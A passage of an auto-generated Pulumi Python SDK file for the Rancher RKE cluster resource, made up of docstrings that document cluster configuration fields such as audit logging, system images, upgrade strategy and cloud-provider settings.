* `maxAge` (`float`) - Audit log max age. Default: `30` (int)
* `maxBackup` (`float`) - Audit log max backup. Default: `10` (int)
* `maxSize` (`float`) - Audit log max size. Default: `100` (int)
* `path` (`str`) - Audit log path. Default: `/var/log/kube-audit/audit-log.json` (string)
* `policy` (`str`) - Audit policy json encoded definition. `"apiVersion"` and `"kind":"Policy","rules"` fields are required in the json. Ex. `jsonencode({"apiVersion":"audit.k8s.io/v1","kind":"Policy","rules":[{"level":"RequestResponse","resources":[{"group":"","resources":["pods"]}]}]})` [More info](https://rancher.com/docs/rke/latest/en/config-options/audit-log/) (string)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `eventRateLimit` (`dict`) - K8s event rate limit configuration. (list maxitem: 1)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
* `podSecurityPolicy` (`bool`) - Pod Security Policy option for kube API service. Default `false` (bool)
* `secretsEncryptionConfig` (`dict`) - [Encrypt k8s secret data configration](https://rancher.com/docs/rke/latest/en/config-options/secrets-encryption/). (list maxitem: 1)
* `enabled` (`bool`) - Enable secrets encryption. Default: `false` (bool)
* `serviceClusterIpRange` (`str`) - Service Cluster ip Range option for kube controller service (string)
* `serviceNodePortRange` (`str`) - Service Node Port Range option for kube API service (string)
"""
services_kube_controller_deprecated: pulumi.Output[dict]
"""
Use services.kube_controller instead (list maxitems:1)
* `cluster_cidr` (`str`) - Cluster CIDR option for kube controller service (string)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
* `serviceClusterIpRange` (`str`) - Service Cluster ip Range option for kube controller service (string)
"""
services_kube_proxy_deprecated: pulumi.Output[dict]
"""
Use services.kubeproxy instead (list maxitems:1)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
"""
services_kube_scheduler_deprecated: pulumi.Output[dict]
"""
Use services.scheduler instead (list maxitems:1)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `image` (`str`) - Docker image for scheduler service (string)
"""
services_kubelet_deprecated: pulumi.Output[dict]
"""
Use services.kubelet instead (list maxitems:1)
* `cluster_dns_server` (`str`) - Cluster DNS Server option for kubelet service (string)
* `cluster_domain` (`str`) - Cluster Domain option for kubelet service. Default `cluster.local` (string)
* `extraArgs` (`dict`) - Extra arguments for scheduler service (map)
* `extraBinds` (`list`) - Extra binds for scheduler service (list)
* `extraEnvs` (`list`) - Extra environment for scheduler service (list)
* `failSwapOn` (`bool`) - Enable or disable failing when swap on is not supported (bool)
* `generate_serving_certificate` [Generate a certificate signed by the kube-ca](https://rancher.com/docs/rke/latest/en/config-options/services/#kubelet-serving-certificate-requirements). Default `false` (bool)
* `generateServingCertificate` (`bool`)
* `image` (`str`) - Docker image for scheduler service (string)
* `infraContainerImage` (`str`) - Infra container image for kubelet service (string)
"""
ssh_agent_auth: pulumi.Output[bool]
"""
SSH Agent Auth enable (bool)
"""
ssh_cert_path: pulumi.Output[str]
"""
SSH Certificate path (string)
"""
ssh_key_path: pulumi.Output[str]
"""
SSH Private Key path (string)
"""
system_images: pulumi.Output[dict]
"""
RKE k8s cluster system images list (list maxitems:1)
* `alpine` (`str`) - Docker image for alpine (string)
* `calicoCni` (`str`) - Docker image for calico_cni (string)
* `calicoControllers` (`str`) - Docker image for calico_controllers (string)
* `calicoCtl` (`str`) - Docker image for calico_ctl (string)
* `calicoFlexVol` (`str`) - Docker image for calico_flex_vol (string)
* `calicoNode` (`str`) - Docker image for calico_node (string)
* `canalCni` (`str`) - Docker image for canal_cni (string)
* `canalFlannel` (`str`) - Docker image for canal_flannel (string)
* `canalFlexVol` (`str`) - Docker image for canal_flex_vol (string)
* `canalNode` (`str`) - Docker image for canal_node (string)
* `certDownloader` (`str`) - Docker image for cert_downloader (string)
* `coredns` (`str`) - Docker image for coredns (string)
* `corednsAutoscaler` (`str`) - Docker image for coredns_autoscaler (string)
* `dnsmasq` (`str`) - Docker image for dnsmasq (string)
* `etcd` (`str`) - Docker image for etcd (string)
* `flannel` (`str`) - Docker image for flannel (string)
* `flannelCni` (`str`) - Docker image for flannel_cni (string)
* `ingress` (`str`) - Docker image for ingress (string)
* `ingressBackend` (`str`) - Docker image for ingress_backend (string)
* `kubeDns` (`str`) - Docker image for kube_dns (string)
* `kubeDnsAutoscaler` (`str`) - Docker image for kube_dns_autoscaler (string)
* `kubeDnsSidecar` (`str`) - Docker image for kube_dns_sidecar (string)
* `kubernetes` (`str`) - Docker image for kubernetes (string)
* `kubernetesServicesSidecar` (`str`) - Docker image for kubernetes_services_sidecar (string)
* `metricsServer` (`str`) - Docker image for metrics_server (string)
* `nginxProxy` (`str`) - Docker image for nginx_proxy (string)
* `nodelocal` (`str`) - Docker image for nodelocal (string)
* `podInfraContainer` (`str`) - Docker image for pod_infra_container (string)
* `weaveCni` (`str`) - Docker image for weave_cni (string)
* `weaveNode` (`str`) - Docker image for weave_node (string)
* `windowsPodInfraContainer` (`str`) - Docker image for windows_pod_infra_container (string)
"""
update_only: pulumi.Output[bool]
"""
Skip idempotent deployment of control and etcd plane. Default `false` (bool)
"""
upgrade_strategy: pulumi.Output[dict]
"""
RKE k8s cluster upgrade strategy (list maxitems:1)
* `drain` (`bool`) - RKE drain nodes. Default: `false` (bool)
* `drainInput` (`dict`) - RKE drain node input (list Maxitems: 1)
* `deleteLocalData` (`bool`) - Delete RKE node local data. Default: `false` (bool)
* `force` (`bool`) - Force RKE node drain. Default: `false` (bool)
* `gracePeriod` (`float`) - RKE node drain grace period. Default: `-1` (int)
* `ignoreDaemonSets` (`bool`) - Ignore RKE daemon sets. Default: `true` (bool)
* `timeout` (`float`) - RKE node drain timeout. Default: `60` (int)
* `maxUnavailableControlplane` (`str`) - RKE max unavailable controlplane nodes. Default: `1` (string)
* `maxUnavailableWorker` (`str`) - RKE max unavailable worker nodes. Default: `10%` (string)
"""
worker_hosts: pulumi.Output[list]
"""
(Computed) RKE k8s cluster worker nodes (list)
* `address` (`str`) - Address ip for node (string)
* `nodeName` (`str`) - Name of the host provisioned via docker machine (string)
"""
def __init__(__self__, resource_name, opts=None, addon_job_timeout=None, addons=None, addons_includes=None, authentication=None, authorization=None, bastion_host=None, cert_dir=None, cloud_provider=None, cluster_name=None, cluster_yaml=None, custom_certs=None, delay_on_creation=None, dind=None, dind_dns_server=None, dind_storage_driver=None, disable_port_check=None, dns=None, ignore_docker_version=None, ingress=None, kubernetes_version=None, monitoring=None, network=None, nodes=None, nodes_confs=None, prefix_path=None, private_registries=None, restore=None, rotate_certificates=None, services=None, services_etcd_deprecated=None, services_kube_api_deprecated=None, services_kube_controller_deprecated=None, services_kube_proxy_deprecated=None, services_kube_scheduler_deprecated=None, services_kubelet_deprecated=None, ssh_agent_auth=None, ssh_cert_path=None, ssh_key_path=None, system_images=None, update_only=None, upgrade_strategy=None, __props__=None, __name__=None, __opts__=None):
"""
Provides RKE cluster resource. This can be used to create RKE clusters and retrieve their information.
RKE clusters can be defined in the provider:
- Using cluster_yaml: The full RKE cluster is defined in an RKE cluster.yml file.
- Using the TF provider arguments to define the entire cluster.
- Using a combination of both the cluster_yaml and TF provider arguments. The TF arguments will override the cluster_yaml options if collisions occur.
> This content is derived from https://github.com/rancher/terraform-provider-rke/blob/master/website/docs/r/cluster.html.markdown.
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[float] addon_job_timeout: RKE k8s cluster addon deployment timeout in seconds for status check (int)
:param pulumi.Input[str] addons: RKE k8s cluster user addons YAML manifest to be deployed (string)
:param pulumi.Input[list] addons_includes: RKE k8s cluster user addons YAML manifest urls or paths to be deployed (list)
:param pulumi.Input[dict] authentication: RKE k8s cluster authentication configuration (list maxitems:1)
:param pulumi.Input[dict] authorization: RKE k8s cluster authorization mode configuration (list maxitems:1)
:param pulumi.Input[dict] bastion_host: RKE k8s cluster bastion Host configuration (list maxitems:1)
:param pulumi.Input[str] cert_dir: Specify a certificate dir path (string)
:param pulumi.Input[dict] cloud_provider: Calico cloud provider (string)
:param pulumi.Input[str] cluster_name: RKE k8s cluster name used in the kube config (string)
:param pulumi.Input[str] cluster_yaml: RKE k8s cluster config yaml encoded. Provider arguments take precedence over this one (string)
:param pulumi.Input[bool] custom_certs: Use custom certificates from a cert dir (string)
:param pulumi.Input[float] delay_on_creation: RKE k8s cluster delay on creation (int)
:param pulumi.Input[bool] dind: Deploy RKE cluster on a dind environment. Default: `false` (bool)
:param pulumi.Input[str] dind_dns_server: DinD RKE cluster dns (string)
:param pulumi.Input[str] dind_storage_driver: DinD RKE cluster storage driver (string)
:param pulumi.Input[bool] disable_port_check: Enable/Disable RKE k8s cluster port checking. Default `false` (bool)
:param pulumi.Input[dict] dns: RKE k8s cluster DNS Config (list maxitems:1)
:param pulumi.Input[bool] ignore_docker_version: Enable/Disable RKE k8s cluster strict docker version checking. Default `false` (bool)
:param pulumi.Input[dict] ingress: Docker image for ingress (string)
:param pulumi.Input[str] kubernetes_version: K8s version to deploy. If kubernetes image is specified, image version takes precedence. Default: `rke default` (string)
:param pulumi.Input[dict] monitoring: RKE k8s cluster monitoring Config (list maxitems:1)
:param pulumi.Input[dict] network: (list maxitems:1)
:param pulumi.Input[list] nodes: RKE k8s cluster nodes (list)
:param pulumi.Input[str] prefix_path: RKE k8s directory path (string)
:param pulumi.Input[list] private_registries: RKE k8s cluster private docker registries (list)
:param pulumi.Input[dict] restore: Restore cluster. Default `false` (bool)
:param pulumi.Input[dict] rotate_certificates: RKE k8s cluster rotate certificates configuration (list maxitems:1)
:param pulumi.Input[dict] services: Services to rotate their certs. `etcd`, `kubelet`, `kube-apiserver`, `kube-proxy`, `kube-scheduler` and `kube-controller-manager` are supported (list)
:param pulumi.Input[dict] services_etcd_deprecated: Use services.etcd instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_api_deprecated: Use services.kube_api instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_controller_deprecated: Use services.kube_controller instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_proxy_deprecated: Use services.kubeproxy instead (list maxitems:1)
:param pulumi.Input[dict] services_kube_scheduler_deprecated: Use services.scheduler instead (list maxitems:1)
:param pulumi.Input[dict] services_kubelet_deprecated: Use services.kubelet instead (list maxitems:1)
:param pulumi.Input[bool] ssh_agent_auth: SSH Agent Auth enable (bool)
:param pulumi.Input[str] ssh_cert_path: SSH Certificate path (string)
:param pulumi.Input[str] ssh_key_path: SSH Private Key path (string)
:param pulumi.Input[dict] system_images: RKE k8s cluster system images list (list maxitems:1)
:param pulumi.Input[bool] update_only: Skip idempotent deployment of control and etcd plane. Default `false` (bool)
:param pulumi.Input[dict] upgrade_strategy: RKE k8s cluster upgrade strategy (list maxitems:1)
The **authentication** object supports the following:
* `sans` (`pulumi.Input[list]`) - List of additional hostnames and IPs to include in the api server PKI cert (list)
* `strategy` (`pulumi.Input[str]`) - Authentication strategy that will be used in RKE k8s cluster. Default: `x509` (string)
* `webhook` (`pulumi.Input[dict]`) - Webhook configuration options (list maxitem: 1)
* `cacheTimeout` (`pulumi.Input[str]`) - Controls how long to cache authentication decisions (string)
* `configFile` (`pulumi.Input[str]`) - Multiline string that represent a custom webhook config file (string)
The **authorization** object supports the following:
* `mode` (`pulumi.Input[str]`) - RKE mode for authorization. `rbac` and `none` modes are available. Default `rbac` (string)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
The **bastion_host** object supports the following:
* `address` (`pulumi.Input[str]`) - Address ip for node (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `ssh_agent_auth` (`pulumi.Input[bool]`) - SSH Agent Auth enable (bool)
* `sshCert` (`pulumi.Input[str]`) - SSH Certificate (string)
* `ssh_cert_path` (`pulumi.Input[str]`) - SSH Certificate path (string)
* `sshKey` (`pulumi.Input[str]`) - SSH Private Key (string)
* `ssh_key_path` (`pulumi.Input[str]`) - SSH Private Key path (string)
* `user` (`pulumi.Input[str]`) - Registry user (string)
The **cloud_provider** object supports the following:
* `awsCloudConfig` (`pulumi.Input[dict]`) - Use aws_cloud_provider instead
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `disableSecurityGroupIngress` (`pulumi.Input[bool]`) - Disables the automatic ingress creation. Default `false` (bool)
* `disableStrictZoneCheck` (`pulumi.Input[bool]`) - Setting this to true will disable the check and provide a warning that the check was skipped. Default `false` (bool)
* `elbSecurityGroup` (`pulumi.Input[str]`) - Use these ELB security groups instead of creating new ones (string)
* `kubernetesClusterId` (`pulumi.Input[str]`) - The cluster id we'll use to identify our cluster resources (string)
* `kubernetesClusterTag` (`pulumi.Input[str]`) - Legacy cluster id we'll use to identify our cluster resources (string)
* `roleArn` (`pulumi.Input[str]`) - IAM role to assume when interacting with AWS APIs (string)
* `routeTableId` (`pulumi.Input[str]`) - Enables using a specific RouteTable (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `vpc` (`pulumi.Input[str]`) - The AWS VPC flag enables the possibility to run the master components on a different aws account, on a different cloud provider or on-premises. If the flag is set also the KubernetesClusterTag must be provided (string)
* `zone` (`pulumi.Input[str]`) - The AWS zone (string)
* `serviceOverrides` (`pulumi.Input[list]`) - (list)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `service` (`pulumi.Input[str]`) - (string)
* `signingMethod` (`pulumi.Input[str]`) - (string)
* `signingName` (`pulumi.Input[str]`) - (string)
* `signingRegion` (`pulumi.Input[str]`) - (string)
* `url` (`pulumi.Input[str]`) - Registry URL (string)
* `awsCloudProvider` (`pulumi.Input[dict]`) - AWS Cloud Provider config [rke-aws-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/aws/) (list maxitems:1)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `disableSecurityGroupIngress` (`pulumi.Input[bool]`) - Disables the automatic ingress creation. Default `false` (bool)
* `disableStrictZoneCheck` (`pulumi.Input[bool]`) - Setting this to true will disable the check and provide a warning that the check was skipped. Default `false` (bool)
* `elbSecurityGroup` (`pulumi.Input[str]`) - Use these ELB security groups instead of creating new ones (string)
* `kubernetesClusterId` (`pulumi.Input[str]`) - The cluster id we'll use to identify our cluster resources (string)
* `kubernetesClusterTag` (`pulumi.Input[str]`) - Legacy cluster id we'll use to identify our cluster resources (string)
* `roleArn` (`pulumi.Input[str]`) - IAM role to assume when interacting with AWS APIs (string)
* `routeTableId` (`pulumi.Input[str]`) - Enables using a specific RouteTable (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `vpc` (`pulumi.Input[str]`) - The AWS VPC flag enables the possibility to run the master components on a different aws account, on a different cloud provider or on-premises. If the flag is set also the KubernetesClusterTag must be provided (string)
* `zone` (`pulumi.Input[str]`) - The AWS zone (string)
* `serviceOverrides` (`pulumi.Input[list]`) - (list)
* `key` (`pulumi.Input[str]`) - TLS key for etcd service (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `service` (`pulumi.Input[str]`) - (string)
* `signingMethod` (`pulumi.Input[str]`) - (string)
* `signingName` (`pulumi.Input[str]`) - (string)
* `signingRegion` (`pulumi.Input[str]`) - (string)
* `url` (`pulumi.Input[str]`) - Registry URL (string)
* `azureCloudConfig` (`pulumi.Input[dict]`) - Use azure_cloud_provider instead
* `aadClientCertPassword` (`pulumi.Input[str]`) - (string)
* `aadClientCertPath` (`pulumi.Input[str]`) - (string)
* `aadClientId` (`pulumi.Input[str]`) - (string)
* `aadClientSecret` (`pulumi.Input[str]`) - (string)
* `cloud` (`pulumi.Input[str]`) - (string)
* `cloudProviderBackoff` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderBackoffDuration` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffExponent` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffJitter` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffRetries` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimit` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderRateLimitBucket` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimitQps` (`pulumi.Input[float]`) - (int)
* `loadBalancerSku` (`pulumi.Input[str]`)
* `location` (`pulumi.Input[str]`) - (string)
* `maximumLoadBalancerRuleCount` (`pulumi.Input[float]`) - (int)
* `primaryAvailabilitySetName` (`pulumi.Input[str]`) - (string)
* `primaryScaleSetName` (`pulumi.Input[str]`) - (string)
* `resourceGroup` (`pulumi.Input[str]`) - (string)
* `routeTableName` (`pulumi.Input[str]`) - (string)
* `securityGroupName` (`pulumi.Input[str]`) - (string)
* `subnetName` (`pulumi.Input[str]`) - (string)
* `subscriptionId` (`pulumi.Input[str]`) - (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `useInstanceMetadata` (`pulumi.Input[bool]`) - (bool)
* `useManagedIdentityExtension` (`pulumi.Input[bool]`) - (bool)
* `vmType` (`pulumi.Input[str]`) - (string)
* `vnetName` (`pulumi.Input[str]`) - (string)
* `vnetResourceGroup` (`pulumi.Input[str]`) - (string)
* `azureCloudProvider` (`pulumi.Input[dict]`) - Azure Cloud Provider config [rke-azure-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/azure/) (list maxitems:1)
* `aadClientCertPassword` (`pulumi.Input[str]`) - (string)
* `aadClientCertPath` (`pulumi.Input[str]`) - (string)
* `aadClientId` (`pulumi.Input[str]`) - (string)
* `aadClientSecret` (`pulumi.Input[str]`) - (string)
* `cloud` (`pulumi.Input[str]`) - (string)
* `cloudProviderBackoff` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderBackoffDuration` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffExponent` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffJitter` (`pulumi.Input[float]`) - (int)
* `cloudProviderBackoffRetries` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimit` (`pulumi.Input[bool]`) - (bool)
* `cloudProviderRateLimitBucket` (`pulumi.Input[float]`) - (int)
* `cloudProviderRateLimitQps` (`pulumi.Input[float]`) - (int)
* `loadBalancerSku` (`pulumi.Input[str]`)
* `location` (`pulumi.Input[str]`) - (string)
* `maximumLoadBalancerRuleCount` (`pulumi.Input[float]`) - (int)
* `primaryAvailabilitySetName` (`pulumi.Input[str]`) - (string)
* `primaryScaleSetName` (`pulumi.Input[str]`) - (string)
* `resourceGroup` (`pulumi.Input[str]`) - (string)
* `routeTableName` (`pulumi.Input[str]`) - (string)
* `securityGroupName` (`pulumi.Input[str]`) - (string)
* `subnetName` (`pulumi.Input[str]`) - (string)
* `subscriptionId` (`pulumi.Input[str]`) - (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `useInstanceMetadata` (`pulumi.Input[bool]`) - (bool)
* `useManagedIdentityExtension` (`pulumi.Input[bool]`) - (bool)
* `vmType` (`pulumi.Input[str]`) - (string)
* `vnetName` (`pulumi.Input[str]`) - (string)
* `vnetResourceGroup` (`pulumi.Input[str]`) - (string)
* `customCloudConfig` (`pulumi.Input[str]`) - Use custom_cloud_provider instead
* `customCloudProvider` (`pulumi.Input[str]`) - Custom Cloud Provider config (string)
* `name` (`pulumi.Input[str]`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `openstackCloudConfig` (`pulumi.Input[dict]`) - Use openstack_cloud_provider instead
* `blockStorage` (`pulumi.Input[dict]`) - (list maxitems:1)
* `bsVersion` (`pulumi.Input[str]`) - (string)
* `ignoreVolumeAz` (`pulumi.Input[bool]`) - (string)
* `trustDevicePath` (`pulumi.Input[bool]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `authUrl` (`pulumi.Input[str]`) - (string)
* `caFile` (`pulumi.Input[str]`) - (string)
* `domainId` (`pulumi.Input[str]`) - Required if `domain_name` not provided. (string)
* `domainName` (`pulumi.Input[str]`) - Required if `domain_id` not provided. (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `tenantName` (`pulumi.Input[str]`) - Required if `tenant_id` not provided. (string)
* `trustId` (`pulumi.Input[str]`) - (string)
* `userId` (`pulumi.Input[str]`) - Required if `username` not provided. (string)
* `username` (`pulumi.Input[str]`) - Required if `user_id` not provided. (string)
* `loadBalancer` (`pulumi.Input[dict]`) - (list maxitems:1)
* `createMonitor` (`pulumi.Input[bool]`) - (bool)
* `floatingNetworkId` (`pulumi.Input[str]`) - (string)
* `lbMethod` (`pulumi.Input[str]`) - (string)
* `lbProvider` (`pulumi.Input[str]`) - (string)
* `lbVersion` (`pulumi.Input[str]`) - (string)
* `manageSecurityGroups` (`pulumi.Input[bool]`) - (bool)
* `monitorDelay` (`pulumi.Input[str]`) - Default `60s` (string)
* `monitorMaxRetries` (`pulumi.Input[float]`) - Default 5 (int)
* `monitorTimeout` (`pulumi.Input[str]`) - Default `30s` (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `useOctavia` (`pulumi.Input[bool]`) - (bool)
* `metadata` (`pulumi.Input[dict]`) - (list maxitems:1)
* `requestTimeout` (`pulumi.Input[float]`) - (int)
* `searchOrder` (`pulumi.Input[str]`) - (string)
* `route` (`pulumi.Input[dict]`) - (list maxitems:1)
* `routerId` (`pulumi.Input[str]`) - (string)
* `openstackCloudProvider` (`pulumi.Input[dict]`) - Openstack Cloud Provider config [rke-openstack-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/openstack/) (list maxitems:1)
* `blockStorage` (`pulumi.Input[dict]`) - (list maxitems:1)
* `bsVersion` (`pulumi.Input[str]`) - (string)
* `ignoreVolumeAz` (`pulumi.Input[bool]`) - (string)
* `trustDevicePath` (`pulumi.Input[bool]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `authUrl` (`pulumi.Input[str]`) - (string)
* `caFile` (`pulumi.Input[str]`) - (string)
* `domainId` (`pulumi.Input[str]`) - Required if `domain_name` not provided. (string)
* `domainName` (`pulumi.Input[str]`) - Required if `domain_id` not provided. (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `region` (`pulumi.Input[str]`) - Region for S3 service (string)
* `tenantId` (`pulumi.Input[str]`) - Required if `tenant_name` not provided. (string)
* `tenantName` (`pulumi.Input[str]`) - Required if `tenant_id` not provided. (string)
* `trustId` (`pulumi.Input[str]`) - (string)
* `userId` (`pulumi.Input[str]`) - Required if `username` not provided. (string)
* `username` (`pulumi.Input[str]`) - Required if `user_id` not provided. (string)
* `loadBalancer` (`pulumi.Input[dict]`) - (list maxitems:1)
* `createMonitor` (`pulumi.Input[bool]`) - (bool)
* `floatingNetworkId` (`pulumi.Input[str]`) - (string)
* `lbMethod` (`pulumi.Input[str]`) - (string)
* `lbProvider` (`pulumi.Input[str]`) - (string)
* `lbVersion` (`pulumi.Input[str]`) - (string)
* `manageSecurityGroups` (`pulumi.Input[bool]`) - (bool)
* `monitorDelay` (`pulumi.Input[str]`) - Default `60s` (string)
* `monitorMaxRetries` (`pulumi.Input[float]`) - Default 5 (int)
* `monitorTimeout` (`pulumi.Input[str]`) - Default `30s` (string)
* `subnetId` (`pulumi.Input[str]`) - (string)
* `useOctavia` (`pulumi.Input[bool]`) - (bool)
* `metadata` (`pulumi.Input[dict]`) - (list maxitems:1)
* `requestTimeout` (`pulumi.Input[float]`) - (int)
* `searchOrder` (`pulumi.Input[str]`) - (string)
* `route` (`pulumi.Input[dict]`) - (list maxitems:1)
* `routerId` (`pulumi.Input[str]`) - (string)
* `vsphereCloudConfig` (`pulumi.Input[dict]`) - Use vsphere_cloud_provider instead
* `disk` (`pulumi.Input[dict]`) - (list maxitems:1)
* `scsiControllerType` (`pulumi.Input[str]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `datastore` (`pulumi.Input[str]`) - (string)
* `insecureFlag` (`pulumi.Input[bool]`) - (bool)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `vmName` (`pulumi.Input[str]`) - (string)
* `vmUuid` (`pulumi.Input[str]`) - (string)
* `workingDir` (`pulumi.Input[str]`) - (string)
* `network` (`pulumi.Input[dict]`) - (list maxitems:1)
* `publicNetwork` (`pulumi.Input[str]`) - (string)
* `virtualCenters` (`pulumi.Input[list]`) - (List)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `name` (`pulumi.Input[str]`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `workspace` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `defaultDatastore` (`pulumi.Input[str]`) - (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `resourcepoolPath` (`pulumi.Input[str]`) - (string)
* `server` (`pulumi.Input[str]`) - (string)
* `vsphereCloudProvider` (`pulumi.Input[dict]`) - Vsphere Cloud Provider config [rke-vsphere-cloud-provider](https://rancher.com/docs/rke/latest/en/config-options/cloud-providers/vsphere/) Extra argument `name` is required on `virtual_center` configuration. (list maxitems:1)
* `disk` (`pulumi.Input[dict]`) - (list maxitems:1)
* `scsiControllerType` (`pulumi.Input[str]`) - (string)
* `global` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `datastore` (`pulumi.Input[str]`) - (string)
* `insecureFlag` (`pulumi.Input[bool]`) - (bool)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `vmName` (`pulumi.Input[str]`) - (string)
* `vmUuid` (`pulumi.Input[str]`) - (string)
* `workingDir` (`pulumi.Input[str]`) - (string)
* `network` (`pulumi.Input[dict]`) - (list maxitems:1)
* `publicNetwork` (`pulumi.Input[str]`) - (string)
* `virtualCenters` (`pulumi.Input[list]`) - (List)
* `datacenters` (`pulumi.Input[str]`) - (string)
* `name` (`pulumi.Input[str]`) - Name of virtualcenter config for Vsphere Cloud Provider config (string)
* `password` (`pulumi.Input[str]`) - Registry password (string)
* `port` (`pulumi.Input[str]`) - Port used for SSH communication. Default `22` (string)
* `soapRoundtripCount` (`pulumi.Input[float]`) - (int)
* `user` (`pulumi.Input[str]`) - Registry user (string)
* `workspace` (`pulumi.Input[dict]`) - (list maxitems:1)
* `datacenter` (`pulumi.Input[str]`) - (string)
* `defaultDatastore` (`pulumi.Input[str]`) - (string)
* `folder` (`pulumi.Input[str]`) - Folder for S3 service. Available from Rancher v2.2.7 (string)
* `resourcepoolPath` (`pulumi.Input[str]`) - (string)
* `server` (`pulumi.Input[str]`) - (string)
The **dns** object supports the following:
* `nodeSelector` (`pulumi.Input[dict]`) - Node selector key pair (map)
* `provider` (`pulumi.Input[str]`) - Monitoring provider (string)
* `reverseCidrs` (`pulumi.Input[list]`) - Reverse CIDRs (list)
* `upstreamNameservers` (`pulumi.Input[list]`) - Upstream nameservers (list)
The **ingress** object supports the following:
* `dnsPolicy` (`pulumi.Input[str]`) - Ingress controller DNS policy. `ClusterFirstWithHostNet`, `ClusterFirst`, `Default`, and `None` are supported. [K8S dns Policy](https://kubernetes.io/docs/concepts/services-networking/dns-pod-service/#pod-s-dns-policy) (string)
* `extraArgs` (`pulumi.Input[dict]`) - Extra arguments for scheduler service (map)
* `nodeSelector` (`pulumi.Input[dict]`) - Node selector key pair (map)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
* `provider` (`pulumi.Input[str]`) - Monitoring provider (string)
The **monitoring** object supports the following:
* `nodeSelector` (`pulumi.Input[dict]`) - Node selector key pair (map)
* `options` (`pulumi.Input[dict]`) - Network provider options (map)
* `provider` (`pulumi.Input[str]`) - Monitoring provider (string)
The **network** object supports the following:
* `calicoNetworkProvider` (`pulumi.Input[dict]`) - Calico network provider config (list maxitems:1)
* `cloud_provider` (`pulumi.Input[str]`) - Calico cloud provider (string)
* `canalNetworkProvider` (`pulumi.Input[dict]`) - Canal network provider config (list maxitems:1)
* `iface` (`pulumi.Input[str]`) - Flannel network interface (string)
* `flannelNetworkProvider` (`pulumi.Input[dict]`) - Flannel network provider config (list maxitems:1)
* `iface` (`pulumi.Input[str]`) - Flannel network interface (string)
